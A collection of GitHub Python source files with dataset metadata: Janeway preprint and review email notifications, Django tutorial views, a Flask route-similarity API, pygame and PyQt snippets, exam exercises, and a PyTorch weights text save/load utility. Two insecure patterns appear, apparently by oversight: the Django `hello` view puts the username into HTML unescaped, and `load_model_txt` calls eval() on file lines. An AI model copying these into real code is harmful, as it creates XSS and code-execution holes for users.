editor.\n :param kwargs: Dictionary containing article and request objects\n :return: None\n \"\"\"\n request = kwargs.get('request')\n preprint = kwargs.get('preprint')\n\n description = '{author} has submitted a new {obj} titled {title}.'.format(\n author=request.user.full_name(),\n obj=request.repository.object_name,\n title=preprint.title,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Submission',\n 'target': preprint,\n }\n\n # Send an email to the user\n context = {'preprint': preprint}\n template = request.repository.submission\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Submission'.format(request.repository.object_name),\n request.user.email,\n email_text,\n log_dict=log_dict,\n )\n\n # Send an email to the preprint editor\n url = request.repository.site_url() + reverse(\n 'repository_manager_article',\n kwargs={'preprint_id': preprint.pk},\n )\n editor_email_text = 'A new {object} has been submitted to {press}: <a href=\"{url}\">{title}</a>.'.format(\n object=request.repository.object_name,\n press=request.repository.name,\n url=url,\n title=preprint.title\n )\n repo = request.repository\n recipients = repo.submission_notification_recipients if repo.submission_notification_recipients.count() > 0 else repo.managers\n for r in recipients.all():\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Submission'.format(request.repository.object_name),\n r.email,\n editor_email_text,\n log_dict=log_dict,\n )\n\n\ndef preprint_notification(**kwargs):\n \"\"\"\n Called by events.Event.ON_PREPRINT_NOTIFICATION handles logging and emails.\n :param kwargs: Dict with preprint, content and request objects\n :return: None\n \"\"\"\n request = kwargs.get('request')\n preprint = kwargs.get('preprint')\n content = kwargs.get('email_content')\n skip = kwargs.get('skip')\n\n if preprint.date_declined:\n types = 'Rejected'\n description = '<p>{editor} has rejected \\'{title}\\'. Moderator reason:</p><p>{reason}</p>'.format(\n editor=request.user.full_name(),\n title=preprint.title,\n reason=preprint.preprint_decline_note,\n )\n else:\n types = 'Accepted'\n description = '{editor} has published \\'{title}\\'.'.format(\n editor=request.user.full_name(),\n title=preprint.title,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': types,\n 'target': preprint,\n }\n\n util_models.LogEntry.add_entry(\n types,\n description,\n 'Info',\n request.user,\n request,\n preprint,\n )\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Submission Decision'.format(preprint.title),\n preprint.owner.email,\n content,\n log_dict=log_dict,\n )\n\n # Stops this notification being sent multiple times.c\n preprint.preprint_decision_notification = True\n preprint.save()\n\n\ndef preprint_comment(**kwargs):\n request = kwargs.get('request')\n preprint = kwargs.get('preprint')\n\n path = reverse(\n 'repository_comments',\n kwargs={'preprint_id': preprint.pk},\n )\n url = request.repository.site_url(path)\n\n email_text = 'A comment has been made on your article {title}, you can moderate comments ' \\\n '<a href=\"{url}\">on the journal site</a>.'.format(\n title=preprint.title,\n url=url,\n )\n\n description = '{author} commented on {title}'.format(\n author=request.user.full_name(),\n title=preprint.title,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Preprint Comment',\n 'target': preprint,\n }\n\n notify_helpers.send_email_with_body_from_user(\n request,\n 'Preprint Comment',\n preprint.owner.email,\n email_text,\n log_dict=log_dict,\n )\n\n\ndef preprint_version_update(**kwargs):\n request = kwargs.get('request')\n pending_update = kwargs.get('pending_update')\n action = kwargs.get('action')\n reason = kwargs.get('reason')\n\n description = '{object} Pending Version {pk}: Decision: {decision}'.format(\n object=request.repository.object_name,\n pk=pending_update.pk,\n decision=action,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Preprint Publication',\n 'target': pending_update.preprint,\n }\n\n context = {\n 'pending_update': pending_update,\n 'reason': reason,\n }\n\n if action == 'accept':\n template = request.repository.accept_version\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n else:\n template = request.repository.decline_version\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Version Update'.format(pending_update.preprint.title),\n pending_update.preprint.owner.email,\n email_text,\n log_dict=log_dict,\n )\n\n\ndef send_cancel_corrections(**kwargs):\n request = kwargs.get('request')\n article = kwargs.get('article')\n correction = kwargs.get('correction')\n\n description = '{user} has cancelled correction task {task}'.format(\n user=request.user,\n task=correction,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Correction Cancelled',\n 'target': article,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_correction_cancelled',\n 'subject_notify_correction_cancelled',\n correction.typesetter.email,\n context=kwargs,\n log_dict=log_dict,\n )\n\n\ndef get_assignment_editors(assignment):\n \"\"\" Get editors relevant to a review or revision assignment\n\n This is a helper function to retrieve the editors that should be\n notified of changes in a review/ revision assignment.\n It exists to handle edge-cases where anassignment might not have an editor\n assigned (e.g.: migrated submissions from another system)\n :param assignment: an instance of ReviewAssignment or RevisionRequest\n :return: A list of Account objects\n \"\"\"\n article = assignment.article\n if assignment.editor:\n editors = [assignment.editor]\n elif article.editorassignment_set.exists():\n # Try article assignment\n editors = [ass.editor for ass in article.editorassignment_set.all()]\n else:\n # Fallback to all editors\n editors = [e for e in assignment.article.journal.editors()]\n return editors\n\n\ndef send_draft_decision_declined(**kwargs):\n request = kwargs.get('request')\n article = kwargs.get('article')\n draft_decision = kwargs.get('draft_decision')\n\n description = '{user} has declined a draft decision {draft} written by {section_editor}'.format(\n user=request.user,\n draft=draft_decision.pk,\n section_editor=draft_decision.section_editor.full_name,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Draft Decision Declined',\n 'target': article,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_se_draft_declined',\n 'subject_notify_se_draft_declined',\n draft_decision.section_editor.email,\n context=kwargs,\n log_dict=log_dict,\n )\n\n\ndef access_request_notification(**kwargs):\n request = kwargs.get('request')\n access_request = kwargs.get('access_request')\n description = '{} has requested the {} role for {}'.format(\n request.user,\n access_request.role.name,\n request.site_type.name,\n )\n\n if request.journal:\n contact = request.journal.get_setting('general', 'submission_access_request_contact')\n else:\n contact = request.repository.submission_access_contact\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Access Request',\n 'target': request.site_type,\n }\n if contact:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_access_request_notification',\n 'subject_submission_access_request_notification',\n contact,\n context={'description': description},\n log_dict=log_dict,\n )\n\n\ndef access_request_complete(**kwargs):\n request = kwargs.get('request')\n access_request = kwargs.get('access_request')\n decision = kwargs.get('decision')\n description = \"Access request from {} evaluated by {}: {}\".format(\n access_request.user.full_name,\n request.user,\n decision,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Access Request',\n 'target': request.site_type,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_access_request_complete',\n 'subject_submission_access_request_complete',\n access_request.user.email,\n context={\n 'access_request': access_request,\n 'decision': decision,\n },\n log_dict=log_dict,\n )\n\n\ndef preprint_review_notification(**kwargs):\n request = kwargs.get('request')\n preprint = kwargs.get('preprint')\n review = kwargs.get('review')\n message = kwargs.get('message')\n skip = kwargs.get('skip', None)\n\n if not skip:\n description = 'Review of {} requested from {} by {}.'.format(\n preprint.title,\n review.reviewer.full_name(),\n review.manager.full_name(),\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Review',\n 'target': preprint,\n }\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Review Invitation'.format(request.repository.object_name),\n review.reviewer.email,\n message,\n log_dict=log_dict,\n )\n\n\ndef preprint_review_status_change(**kwargs):\n request = kwargs.get('request')\n review = kwargs.get('review')\n status_change = kwargs.get('status_change')\n status_text = None\n\n description = \"Status of review {} by {} is now: {}\".format(\n review.pk,\n review.reviewer.full_name(),\n status_change,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Review',\n 'target': review.preprint,\n }\n\n if status_change in ['accept', 'decline', 'complete']:\n to = review.manager.email\n if status_change == 'accept':\n status_text = 'The reviewer has agreed to add a comment.'\n elif status_change == 'decline':\n status_text = 'The reviewer has declined to add a comment.'\n elif status_change == 'complete':\n status_text = 'The reviewer has submitted their comment.'\n template = request.repository.manager_review_status_change\n else: # withdraw\n to = review.reviewer.email\n template = request.repository.reviewer_review_status_change\n\n context = {\n 'review': review,\n 'status_text': status_text,\n 'url': request.repository.site_url(path=reverse(\n 'repository_review_detail',\n kwargs={\n 'preprint_id': review.preprint.pk,\n 'review_id': review.pk\n }\n ))\n }\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Review Invitation Status'.format(request.repository.object_name),\n to,\n email_text,\n log_dict=log_dict,\n )\n","repo_name":"BirkbeckCTP/janeway","sub_path":"src/utils/transactional_emails.py","file_name":"transactional_emails.py","file_ext":"py","file_size_in_byte":61266,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"16"} +{"seq_id":"15664136315","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth.models import User\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom .models import Project, Task\r\nfrom django.shortcuts import get_object_or_404\r\nfrom .forms import CreateNewTask\r\nfrom .forms import CreateNewProject\r\n\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n title = \"welcome to Django course !!\"\r\n return render(request, 'index.html', {\r\n \"title\": title\r\n })\r\n\r\n\r\ndef hello(request, username):\r\n return HttpResponse(\"<h1>Hello %s </h1>\" % username)\r\n\r\ndef projects(request):\r\n #projects = list(Project.objects.values())\r\n projects = Project.objects.all()\r\n return render(request, 'projects/projects.html', {\r\n \"projects\": projects\r\n })\r\n\r\ndef tasks(request):\r\n #task = get_object_or_404(Task, id=id)\r\n tasks = Task.objects.all()\r\n return render(request, 'tasks/tasks.html', {\r\n \"tasks\": tasks\r\n })\r\n\r\ndef create_task(request):\r\n if request.method == 'GET':\r\n return render(request, \"tasks/create_task.html\", {\r\n \"form\": CreateNewTask\r\n })\r\n else:\r\n Task.objects.create(title=request.POST['title'], description=request.POST['description'], project_id=2)\r\n return redirect(\"Tasks\")\r\n\r\n\r\ndef create_project(request):\r\n if request.method == 'GET':\r\n return render(request, \"projects/create_project.html\", {\r\n \"form\": CreateNewProject\r\n })\r\n else:\r\n Project.objects.create(name= request.POST[\"name\"])\r\n redirect(\"Projects\")\r\n\r\ndef signup(request):\r\n\r\n if request.method == 'GET':\r\n return render(request, \"user/signup.html\", {\r\n 'form' : UserCreationForm\r\n })\r\n \r\n else:\r\n if request.POST['password1'] == request.POST['password2']:\r\n try:\r\n user = User.objects.create_user(username= request.POST['username'], password= request.POST['password1'])\r\n user.save()\r\n return HttpResponse(\"user created successfully\")\r\n except:\r\n return render(request, \"user/signup.html\", {\r\n 'form' : UserCreationForm,\r\n 'error': 'username already exists'\r\n })\r\n return render(request, \"user/signup.html\", {\r\n 'form' : UserCreationForm,\r\n 'error': 'Password is incorrect'\r\n })\r\n\r\n \r\n\r\n\r\n","repo_name":"cruzisaac51/Django-Project","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37480967147","text":"from flask import Flask, request, jsonify\nfrom polyline import decode\nfrom math import radians, sin, cos, sqrt, atan2\n\napp = Flask(__name__)\n\ndef haversine_distance(lat1, lon1, lat2, lon2):\n R = 6371 # Radius of the Earth in kilometers\n\n # Convert latitude and longitude to radians\n lat1, lon1, lat2, lon2 = map(radians, [lat1, lon1, lat2, lon2])\n\n # Calculate the differences in coordinates\n dlat = lat2 - lat1\n dlon = lon2 - lon1\n\n # Apply the Haversine formula\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n distance = R * c\n\n return distance\n\n\ndef compare_routes(route1, route2):\n total_distance = 0\n total_points = min(len(route1), len(route2))\n\n for i in range(total_points - 1, -1, -1): # Iterate from last coordinates to first\n lat1, lon1 = route1[i]\n lat2, lon2 = route2[i]\n distance = haversine_distance(lat1, lon1, lat2, lon2)\n total_distance += distance\n\n average_distance = total_distance / total_points\n similarity_score = 1 - (average_distance / 100) # Normalize the score between 0 and 1\n\n return similarity_score\n\n\n@app.route('/compare_routes', methods=['POST'])\ndef compare_routes_handler():\n data = request.json\n\n polyline1 = data.get('polyline1', '')\n polyline2 = data.get('polyline2', '')\n\n route1 = decode(polyline1)\n route2 = decode(polyline2)\n\n similarity = compare_routes(route1[::-1], route2[::-1]) # Reverse the routes\n\n response = {\n 'similarity_score': similarity\n }\n\n return jsonify(response)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"AsavaAsava/SchoolPool","sub_path":"routing_algorithm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"21436900714","text":"\nimport sys\nfrom PyQt4 import QtCore, QtGui\nfrom guiElements import *\n\ndef navegationEvents(GUI):\n GUI.pushButton.clicked.connect(lambda: changeWindow(GUI, GUI.pushButton))\n GUI.pushButton_2.clicked.connect(lambda: changeWindow(GUI, GUI.pushButton_2))\n\ndef changeWindow(GUI, btn):\n stackTo = int(btn.objectName())\n GUI.stackedWidget.setCurrentIndex(stackTo)\n\n\n \n\nif __name__ == \"__main__\":\n \n app = QtGui.QApplication(sys.argv)\n MainWindow = QtGui.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n\n navegationEvents(ui)\n\n MainWindow.show()\n sys.exit(app.exec_())\n\n","repo_name":"pablo-novoa/Python","sub_path":"sitchLayoutsQT/switchLayouts.py","file_name":"switchLayouts.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26415541768","text":"import pygame\n#from board import findPosition\nimport board\nfrom options import *\n\nclass Animation(pygame.sprite.Sprite):\n image = None\n rect = None\n\n sliding = False\n falling = False\n location = None\n\n tick = 0\n\n def fallen(self):\n (column, row) = self.location\n if column == 0:\n self.location = (COLUMNS-1, row)\n elif column == COLUMNS-1:\n self.location = (0, row)\n elif row == 0:\n self.location = (column, ROWS-1)\n elif row == ROWS-1:\n self.location = (column, 0)\n self.rect = self.image.get_rect()\n self.rect.center = board.findPosition(self.location)\n\n def fall(self):\n center = self.rect.center\n width = self.image.get_width()\n height = self.image.get_height()\n\n try:\n self.image = pygame.transform.scale(self.image,\n (width-5, height-5))\n self.rect = self.image.get_rect(center=center)\n except ValueError:\n self.falling = False\n self.image = self.imageCopy\n\n self.fallen()\n\n\n def slide(self, direction=-1, location=None, rect=None, speed=3):\n if not location:\n location = self.location\n if not rect:\n rect = self.rect\n\n (column, row) = location\n position = rect.center\n\n if direction == -1:\n direction = self.sliding\n\n if direction == EAST:\n destination = board.findPosition((column+1, row))\n if position[COLUMN] >= destination[COLUMN]:\n self.sliding = -1\n if column+1 == COLUMNS:\n self.falling = True\n else:\n self.location = (column+1, row)\n else:\n rect.left += speed\n elif direction == WEST:\n destination = board.findPosition((column-1, row))\n if position[COLUMN] <= destination[COLUMN]:\n self.sliding = -1\n if column-1 == -1:\n self.falling = True\n else:\n self.location = (column-1, row)\n else:\n rect.left -= speed\n elif direction == NORTH:\n destination = board.findPosition((column, row-1))\n if position[ROW] <= destination[ROW]:\n self.sliding = -1\n if row-1 == -1:\n self.falling = True\n else:\n self.location = (column, row-1)\n else:\n rect.top -= speed\n elif direction == SOUTH:\n destination = board.findPosition((column, row+1))\n if position[ROW] >= destination[ROW]:\n self.sliding = -1\n if row+1 == ROWS:\n self.falling = True\n else:\n self.location = (column, row+1)\n else:\n rect.top += 3\n\n def bounce(self, speed=2):\n if not self.movement:\n if self.direction == SOUTH:\n self.rect.top += speed\n elif self.direction == NORTH:\n self.rect.top -= speed\n elif self.direction == EAST:\n self.rect.left += speed\n elif self.direction == WEST:\n self.rect.left -= speed\n else:\n if self.direction == SOUTH:\n self.rect.top -= speed\n elif self.direction == NORTH:\n self.rect.top += speed\n elif self.direction == EAST:\n self.rect.left -= speed\n elif self.direction == WEST:\n self.rect.left += speed\n\n\n def update(self):\n self.tick += 1\n\n if self.sliding > -1:\n self.slide()\n elif self.falling:\n self.fall()\n\n \n\n","repo_name":"pdevine/happytown-python","sub_path":"gamelib-old/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24998508943","text":"import numpy as np\nimport scipy.integrate as spi\nimport matplotlib.pyplot as plt\n\n\ndef f(x, a):\n\tx = np.array([x]) if isinstance(x, int) else x\n\tx = np.array([x]) if isinstance(x, float) else x\n\tx = np.array(x) if isinstance(x, list) else x\n\tx = x.astype(np.float)\n\t# print(type(x))\n\tassert type(x) == np.ndarray\n\tnorm = np.sqrt(12. / (a * a * a))\n\treturn np.piecewise(x, [x < a / 2., x >= a / 2.], [lambda x: norm * x, lambda x: norm * (a - x)])\n\n\ndef psi_n(x, n, a):\n\treturn np.sqrt(2. / a) * np.sin(n * x * np.pi / a)\n\n\ndef init_fun(x, n, a):\n\treturn f(x, a) * psi_n(x, n, a)\n\n\ndef c(n, a):\n\tif n == 0 or n % 2 == 0:\n\t\treturn\n\treturn spi.quad(init_fun, 0, a, args=(n, a), limit=100)[0]\n\n\ndef run():\n\t# print(f_slow(0, 10.), f_slow(3, 10), f_slow(5, 10), f_slow(7, 10), f_slow(10, 10))\n\n\ta = np.array([3.])\n\t# a = 3.\n\t# print(f(a, 10.))\n\t# print(f(np.array([0, 3, 5, 7, 10], dtype=float), 10))\n\t# exit()\n\n\t\"\"\"\n\t# fig0 = plt.figure(figsize=(10, 8))\n\tx_r = np.arange(0, 10, 0.01)\n\tplt.plot(x_r, f(x_r, 10))\n\tplt.show()\n\t\"\"\"\n\n\tNmax = 40\n\ta_l = 10.\n\ta_step = 10./100\n\tnl = np.array(range(Nmax))\n\tcx = np.array([c(n, a_l) for n in nl])\n\tprint(cx)\n\tprint(cx.shape)\n\tprint(cx[0], cx[1], cx[2], cx[3], cx[4])\n\tprint(np.sum(cx * cx), cx[Nmax - 1])\n\n\nif __name__ == '__main__':\n\trun()\n","repo_name":"zhangzhengde0225/quantum_element","sub_path":"Schrodinger/QMPython/infinite_square_well_solution.py","file_name":"infinite_square_well_solution.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"18696788609","text":"import math\r\nimport unittest\r\nimport warnings\r\nfrom collections import defaultdict\r\n\r\n\r\ndef odstrani_enake(s, t):\r\n i = 0\r\n while i < len(s):\r\n if s[i] == t[i]:\r\n del s[i]\r\n del t[i]\r\n else:\r\n i += 1\r\n\r\n\r\ndef diff(datoteka1, datoteka2):\r\n razlike = []\r\n st_vrstice = 1\r\n # lahko zazipamo vrstici dveh datotek\r\n for ime in zip(open(datoteka1), open(datoteka2)):\r\n ime1,ime2 = ime\r\n if ime1 != ime2:\r\n # Tudi če ne pokaže metode strip() na stringih seveda deluje\r\n razlike.append((st_vrstice, ime1.strip(), ime2.strip()))\r\n st_vrstice += 1\r\n return razlike\r\n\r\n\r\ndef mesta(s):\r\n seznam = []\r\n _mesta = defaultdict(list)\r\n for ime,mesto in s:\r\n _mesta[mesto].append(ime)\r\n for mesto in _mesta:\r\n seznam.append(_mesta[mesto])\r\n if len(_mesta[mesto]) > 1:\r\n for m in _mesta[mesto][1:]:\r\n seznam.append([])\r\n return seznam\r\n\r\n\r\ndef dovolj_lihih(s, n):\r\n if s == [] and n > 0:\r\n return False\r\n if s == [] and n <= 0:\r\n return True\r\n elif s[0] % 2 == 1:\r\n return dovolj_lihih(s[1:], n - 1)\r\n else:\r\n return dovolj_lihih(s[1:], n)\r\n\r\n\r\nclass Parkirisce:\r\n\r\n def __init__(self, parkirna_mesta):\r\n self.parkirna_mesta = parkirna_mesta\r\n self.parkirana_vozila = []\r\n self.vsota = 0\r\n self.zasedena = 0\r\n\r\n def prosto(self):\r\n return len(self.parkirana_vozila) < self.parkirna_mesta\r\n\r\n def parkiraj(self, registracija, cas):\r\n if self.prosto():\r\n self.parkirana_vozila.append((registracija, cas))\r\n\r\n def odpelji(self, registracija, cas):\r\n cena = 0\r\n for r,c in self.parkirana_vozila:\r\n if registracija == r:\r\n cena = abs(cas - c)\r\n self.parkirana_vozila.remove((r,c))\r\n break\r\n self.vsota += math.ceil(cena)\r\n return math.ceil(cena)\r\n\r\n def zasluzek(self):\r\n return self.vsota\r\n\r\n\r\n\r\n\r\nclass Test(unittest.TestCase):\r\n def setUp(self):\r\n warnings.simplefilter(\"ignore\", ResourceWarning)\r\n\r\n def test_01_odstrani_enake(self):\r\n a = [1, 3, 2, 13, 2, 4, 1]\r\n b = [8, 3, 13, 8, 2, 4, 5]\r\n self.assertIsNone(odstrani_enake(a, b))\r\n self.assertEqual([1, 2, 13, 1], a)\r\n self.assertEqual([8, 13, 8, 5], b)\r\n\r\n a = [1, 1, 1, 1, 1]\r\n b = [1, 1, 1, 1, 1]\r\n self.assertIsNone(odstrani_enake(a, b))\r\n self.assertEqual([], a)\r\n self.assertEqual([], b)\r\n\r\n def test_02_diff(self):\r\n with open(\"f1.txt\", \"wt\") as f:\r\n f.write(\"\"\"Ana\r\nBerta\r\nCecilija\r\nDani\r\nEma\"\"\")\r\n with open(\"f2.txt\", \"wt\") as f:\r\n f.write(\"\"\"Ana\r\nBerta\r\nCilka\r\nDani\r\nEva Ema\"\"\")\r\n self.assertEqual([(3, 'Cecilija', 'Cilka'), (5, 'Ema', 'Eva Ema')], diff(\"f1.txt\", \"f2.txt\"))\r\n\r\n def test_03_mesta(self):\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\"]],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 5)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\"], [], [\"Ema\"],\r\n [\"Fanči\", \"Greta\"], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 8), (\"Fanči\", 6), (\"Greta\", 6)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\", \"Ema\"], [], [],\r\n [\"Fanči\", \"Greta\"], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 6), (\"Greta\", 6)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\", \"Ema\", \"Fanči\"], [], [], [],\r\n [\"Greta\"]],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 6)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\", \"Ema\", \"Fanči\", \"Greta\"],\r\n [], [], [], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 12)]))\r\n self.assertEqual(\r\n [[\"Ana\", \"Berta\"], [], [\"Cilka\", \"Dani\", \"Ema\", \"Fanči\", \"Greta\"],\r\n [], [], [], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 15), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 12)]))\r\n self.assertEqual(\r\n [[\"Ana\", \"Berta\", \"Cilka\", \"Dani\", \"Ema\", \"Fanči\", \"Greta\"],\r\n [], [], [], [], [], []],\r\n mesta([(\"Ana\", 12), (\"Berta\", 12), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 12)]))\r\n\r\n def test_04_dovolj_lihih(self):\r\n self.assertTrue(dovolj_lihih([], 0))\r\n self.assertFalse(dovolj_lihih([], 1))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 6))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 5))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 4))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 3))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 2))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 1))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 0))\r\n self.assertFalse(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 7))\r\n\r\n\r\n def test_05_parkirisce(self):\r\n parkirisce = Parkirisce(3)\r\n\r\n self.assertTrue(parkirisce.prosto())\r\n self.assertEqual(0, parkirisce.zasluzek())\r\n\r\n self.assertIsNone(parkirisce.parkiraj(\"A123\", 8.25))\r\n self.assertTrue(parkirisce.prosto()) # parkiran je A123\r\n self.assertEqual(0, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"Z234\", 8.50)\r\n self.assertTrue(parkirisce.prosto()) # parkirana A123 in Z234\r\n self.assertEqual(0, parkirisce.zasluzek())\r\n\r\n self.assertEqual(1, parkirisce.odpelji(\"Z234\", 8.75))\r\n self.assertTrue(parkirisce.prosto()) # parkirana je A123\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"B345\", 10.30)\r\n self.assertTrue(parkirisce.prosto()) # parkirana A123 in B345\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"C567\", 10.50)\r\n self.assertFalse(parkirisce.prosto()) # parkirani A123, B345, C567\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"D567\", 11.00) # ne more parkirati\r\n self.assertFalse(parkirisce.prosto()) # parkirani A123, B345, C567\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n self.assertEqual(3, parkirisce.odpelji(\"A123\", 11.20))\r\n self.assertTrue(parkirisce.prosto()) # parkirani B345, C567\r\n self.assertEqual(4, parkirisce.zasluzek())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"sp9028/P1","sub_path":"Rešitve starih izpitov/12.8.py","file_name":"12.8.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29409237382","text":"#!/usr/bin/python\nimport sys\nimport argparse\nimport torch\nimport traceback\n\n\ndef save_model_txt(model, path):\n fout = open(path, \"w\")\n for k, v in model[\"model_sd\"].items(): # for image classifier\n fout.write(str(k) + \"\\n\")\n fout.write(str(v.tolist()) + \"\\n\")\n fout.close()\n\n\ndef load_model_txt(model, path):\n print(\"Loading...\")\n data_dict = {}\n fin = open(path, \"r\")\n i = 0\n odd = 1\n prev_key = None\n while True:\n s = fin.readline().strip()\n if not s:\n break\n if odd:\n prev_key = s\n else:\n try:\n val = eval(s)\n except Exception as e:\n print(traceback.format_stack(e))\n data_dict[prev_key] = s\n i += 1\n import IPython\n\n IPython.embed()\n continue\n if type(val) != type([]):\n data_dict[prev_key] = torch.FloatTensor([eval(s)])[0]\n else:\n data_dict[prev_key] = torch.FloatTensor(eval(s))\n i += 1\n odd = (odd + 1) % 2\n\n # Replace existing values with loaded\n own_state = model.state_dict()\n print(\"Items:\", len(own_state.items()))\n for k, v in data_dict.items():\n if not k in own_state:\n print(\"Parameter\", k, \"not found in own_state!!!\")\n else:\n try:\n own_state[k].copy_(v)\n except:\n print(\"Key:\", k)\n print(\"Old:\", own_state[k])\n print(\"New:\", v)\n sys.exit(0)\n print(\"Model loaded\")\n\n\nif __name__ == \"__main__\":\n # Run this script with python3 conda\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--weight_path\")\n args = parser.parse_args()\n weight_path = args.weight_path\n\n model = torch.load(weight_path, map_location=torch.device(\"cpu\"))\n if \".ckpt\" in weight_path:\n model = model[\"state_dict\"]\n save_name = weight_path.replace(\".ckpt\", \".txt\")\n elif \".pth\" in weight_path:\n save_name = weight_path.replace(\".pth\", \".txt\")\n else:\n save_name = weight_path.replace(\".pt\", \".txt\")\n save_model_txt(model, save_name)\n","repo_name":"sashank-tirumala/cloth_reskin_ros","sub_path":"delta_reskin_pkg/scripts/model_load_util.py","file_name":"model_load_util.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18313509335","text":"import argparse\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport math\nimport os \nimport warnings\n\nfrom sklearn.preprocessing import LabelEncoder\nwarnings.filterwarnings('ignore')\n\nfrom sklearn.model_selection import train_test_split\nfrom scipy.stats import pearsonr\nfrom tqdm import tqdm \nfrom evaluate import Recall,Precision,Coverage,Popularity,RMSE\n\nclass ItemCF():\n def __init__(self, file_path, mode):\n assert mode in ['cosine','pearsonr'], 